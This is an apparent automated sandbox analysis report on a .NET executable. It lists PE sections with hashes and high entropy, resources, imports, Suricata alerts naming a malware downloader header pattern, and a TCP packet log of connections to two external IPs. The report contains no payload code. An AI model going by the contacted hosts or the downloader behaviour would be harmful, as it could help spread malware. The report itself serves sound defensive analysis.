add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbe900	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc0000	0x21e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbc958	0xbca00	923a0c2aee2680c16034d57cfddfe8ac	False	0.8792880736414844	data	7.6723614059541525	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc0000	0x21e0	0x2200	ea9146afed05c31e46910f7e1f941388	False	0.9306066176470589	data	7.619574284347448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc4000	0xc	0x200	f1336c8d8a8357418dcdbfa58806e13c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc00c8	0x1e1f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9939048113085203
RT_GROUP_ICON	0xc1ef8	0x14	data	1.05
RT_VERSION	0xc1f1c	0x2c0	data	0.4616477272727273

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-16T14:23:10.119780+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49720	158.101.44.242	80	TCP
2024-12-16T14:23:12.307348+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49720	158.101.44.242	80	TCP
2024-12-16T14:23:13.225114+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49731	158.101.44.242	80	TCP
2024-12-16T14:23:13.888029+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49733	104.21.67.152	443	TCP
2024-12-16T14:23:15.260415+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49742	158.101.44.242	80	TCP
2024-12-16T14:23:15.338570+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49731	158.101.44.242	80	TCP
2024-12-16T14:23:16.983370+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49749	104.21.67.152	443	TCP
2024-12-16T14:23:18.321124+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49756	158.101.44.242	80	TCP
2024-12-16T14:23:22.903563+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49769	104.21.67.152	443	TCP
2024-12-16T14:23:32.172539+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49805	104.21.67.152	443	TCP
2024-12-16T14:23:38.236425+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49826	104.21.67.152	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 14:23:08.166702032 CET	49720	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:08.286672115 CET	80	49720	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:08.286798954 CET	49720	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:08.287204027 CET	49720	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:08.407398939 CET	80	49720	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:09.491333008 CET	80	49720	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:09.530982971 CET	49720	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:09.650895119 CET	80	49720	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:09.905802965 CET	80	49720	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:10.088124990 CET	49730	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:10.088224888 CET	443	49730	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:10.088532925 CET	49730	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:10.094639063 CET	49730	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:10.094677925 CET	443	49730	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:10.119780064 CET	49720	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:11.331429958 CET	443	49730	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:11.331558943 CET	49730	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:11.335285902 CET	49730	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:11.335298061 CET	443	49730	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:11.335649014 CET	443	49730	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:11.416667938 CET	49730	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:11.463130951 CET	49731	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:11.482331038 CET	49730	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:11.527324915 CET	443	49730	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:11.582933903 CET	80	49731	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:11.583112001 CET	49731	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:11.583290100 CET	49731	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:11.703015089 CET	80	49731	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:11.835628033 CET	443	49730	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:11.835695028 CET	443	49730	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:11.835763931 CET	49730	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:11.841908932 CET	49730	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:11.846127033 CET	49720	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:11.965986013 CET	80	49720	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:12.221487999 CET	80	49720	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:12.223634005 CET	49733	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:12.223664045 CET	443	49733	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:12.223938942 CET	49733	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:12.224317074 CET	49733	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:12.224334955 CET	443	49733	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:12.307348013 CET	49720	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:12.790148973 CET	80	49731	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:12.794301033 CET	49731	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:12.914167881 CET	80	49731	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:13.168008089 CET	80	49731	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:13.219985962 CET	49741	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:13.220025063 CET	443	49741	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:13.220165014 CET	49741	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:13.225114107 CET	49731	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:13.235168934 CET	49741	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:13.235230923 CET	443	49741	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:13.440738916 CET	443	49733	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:13.448482990 CET	49733	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:13.448529005 CET	443	49733	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:13.888062000 CET	443	49733	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:13.888149977 CET	443	49733	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:13.888214111 CET	49733	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:13.888710976 CET	49733	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:13.892834902 CET	49720	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:13.893985987 CET	49742	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:14.012823105 CET	80	49720	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:14.012887955 CET	49720	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:14.013750076 CET	80	49742	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:14.013837099 CET	49742	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:14.013988018 CET	49742	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:14.133753061 CET	80	49742	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:14.447082996 CET	443	49741	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:14.447211981 CET	49741	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:14.448803902 CET	49741	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:14.448824883 CET	443	49741	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:14.449173927 CET	443	49741	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:14.492346048 CET	49741	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:14.535336018 CET	443	49741	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:14.897391081 CET	443	49741	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:14.897454023 CET	443	49741	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:14.897535086 CET	49741	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:14.907269955 CET	49741	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:14.911082983 CET	49731	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:15.032160997 CET	80	49731	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:15.219450951 CET	80	49742	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:15.220669985 CET	49748	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:15.220705032 CET	443	49748	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:15.220798016 CET	49748	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:15.221087933 CET	49748	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:15.221102953 CET	443	49748	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:15.260415077 CET	49742	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:15.294223070 CET	80	49731	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:15.297102928 CET	49749	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:15.297173023 CET	443	49749	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:15.297245026 CET	49749	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:15.297615051 CET	49749	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:15.297648907 CET	443	49749	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:15.338570118 CET	49731	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:16.437076092 CET	443	49748	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:16.438807964 CET	49748	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:16.438828945 CET	443	49748	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:16.532999039 CET	443	49749	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:16.538610935 CET	49749	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:16.538639069 CET	443	49749	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:16.883774996 CET	443	49748	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:16.883837938 CET	443	49748	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:16.884104013 CET	49748	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:16.884318113 CET	49748	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:16.889467955 CET	49755	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:16.983395100 CET	443	49749	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:16.983469009 CET	443	49749	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:16.983946085 CET	49749	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:16.984054089 CET	49749	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:16.987538099 CET	49731	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:16.989295959 CET	49756	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:17.009294033 CET	80	49755	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:17.009376049 CET	49755	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:17.009506941 CET	49755	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:17.107760906 CET	80	49731	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:17.107856035 CET	49731	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:17.109091997 CET	80	49756	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:17.109390020 CET	49756	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:17.110789061 CET	49756	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:17.132066011 CET	80	49755	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:17.232299089 CET	80	49756	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:18.224162102 CET	80	49755	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:18.225338936 CET	49758	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:18.225392103 CET	443	49758	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:18.225452900 CET	49758	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:18.225686073 CET	49758	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:18.225698948 CET	443	49758	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:18.276072025 CET	49755	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:18.320864916 CET	80	49756	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:18.321124077 CET	49756	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:18.322500944 CET	49759	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:18.322551012 CET	443	49759	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:18.322607040 CET	49759	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:18.323071957 CET	49759	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:18.323086023 CET	443	49759	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:18.443538904 CET	80	49756	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:18.443633080 CET	49756	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:19.460074902 CET	443	49758	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:19.462253094 CET	49758	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:19.462292910 CET	443	49758	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:19.533745050 CET	443	49759	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:19.535362005 CET	49759	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:19.535404921 CET	443	49759	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:19.914797068 CET	443	49758	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:19.915209055 CET	443	49758	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:19.915283918 CET	49758	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:19.915776968 CET	49758	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:19.919333935 CET	49755	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:19.920427084 CET	49766	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:19.984639883 CET	443	49759	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:19.984705925 CET	443	49759	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:19.985110044 CET	49759	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:19.985356092 CET	49759	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:19.989398956 CET	49767	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:20.039402008 CET	80	49755	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:20.039479017 CET	49755	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:20.040086031 CET	80	49766	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:20.040164948 CET	49766	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:20.040308952 CET	49766	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:20.109136105 CET	80	49767	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:20.109338999 CET	49767	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:20.109385014 CET	49767	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:20.159980059 CET	80	49766	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:20.229257107 CET	80	49767	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:21.243686914 CET	80	49766	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:21.245079041 CET	49769	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:21.245126963 CET	443	49769	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:21.245198011 CET	49769	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:21.245446920 CET	49769	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:21.245456934 CET	443	49769	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:21.291682005 CET	49766	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:21.314349890 CET	80	49767	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:21.315687895 CET	49774	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:21.315722942 CET	443	49774	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:21.315794945 CET	49774	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:21.316056013 CET	49774	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:21.316068888 CET	443	49774	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:21.354223013 CET	49767	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:22.457365990 CET	443	49769	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:22.458908081 CET	49769	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:22.458939075 CET	443	49769	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:22.529347897 CET	443	49774	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:22.536226988 CET	49774	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:22.536259890 CET	443	49774	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:22.903599024 CET	443	49769	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:22.903688908 CET	443	49769	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:22.903743029 CET	49769	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:22.915498972 CET	49769	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:22.919994116 CET	49766	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:22.920659065 CET	49775	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:22.985829115 CET	443	49774	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:22.985884905 CET	443	49774	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:22.985949993 CET	49774	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:22.986439943 CET	49774	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:22.990283012 CET	49767	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:22.991707087 CET	49776	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:23.040251017 CET	80	49766	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:23.040318966 CET	49766	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:23.040400028 CET	80	49775	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:23.040472031 CET	49775	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:23.040644884 CET	49775	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:23.110269070 CET	80	49767	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:23.110317945 CET	49767	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:23.111569881 CET	80	49776	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:23.111639023 CET	49776	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:23.111809015 CET	49776	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:23.160284042 CET	80	49775	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:23.231458902 CET	80	49776	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:24.244319916 CET	80	49775	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:24.245915890 CET	49781	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:24.245959044 CET	443	49781	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:24.246819019 CET	49781	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:24.246819019 CET	49781	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:24.246857882 CET	443	49781	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:24.291707039 CET	49775	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:24.319961071 CET	80	49776	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:24.321085930 CET	49782	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:24.321182966 CET	443	49782	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:24.321268082 CET	49782	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:24.321482897 CET	49782	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:24.321507931 CET	443	49782	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:24.369827986 CET	49776	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:25.473997116 CET	443	49781	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:25.475662947 CET	49781	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:25.475684881 CET	443	49781	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:25.533317089 CET	443	49782	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:25.534965992 CET	49782	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:25.535038948 CET	443	49782	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:25.921829939 CET	443	49781	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:25.921900034 CET	443	49781	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:25.921952963 CET	49781	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:25.922493935 CET	49781	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:25.925462008 CET	49775	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:25.926614046 CET	49788	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:25.979187012 CET	443	49782	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:25.979254961 CET	443	49782	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:25.979321957 CET	49782	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:25.979846001 CET	49782	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:25.985466957 CET	49789	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:25.985622883 CET	49776	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:26.045635939 CET	80	49775	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:26.045705080 CET	49775	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:26.046363115 CET	80	49788	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:26.047384024 CET	49788	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:26.047564030 CET	49788	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:26.105416059 CET	80	49789	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:26.105561972 CET	49789	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:26.105690956 CET	80	49776	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:26.105798006 CET	49789	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:26.105820894 CET	49776	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:26.167293072 CET	80	49788	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:26.225512981 CET	80	49789	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:27.252557039 CET	80	49788	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:27.253993988 CET	49790	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:27.254053116 CET	443	49790	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:27.254127026 CET	49790	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:27.254450083 CET	49790	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:27.254462004 CET	443	49790	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:27.307307959 CET	49788	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:27.310658932 CET	80	49789	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:27.312392950 CET	49791	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:27.312442064 CET	443	49791	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:27.312511921 CET	49791	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:27.312799931 CET	49791	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:27.312813044 CET	443	49791	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:27.354288101 CET	49789	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:28.469311953 CET	443	49790	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:28.471468925 CET	49790	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:28.471503973 CET	443	49790	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:28.524168968 CET	443	49791	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:28.526083946 CET	49791	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:28.526120901 CET	443	49791	104.21.67.152	192.168.2.6
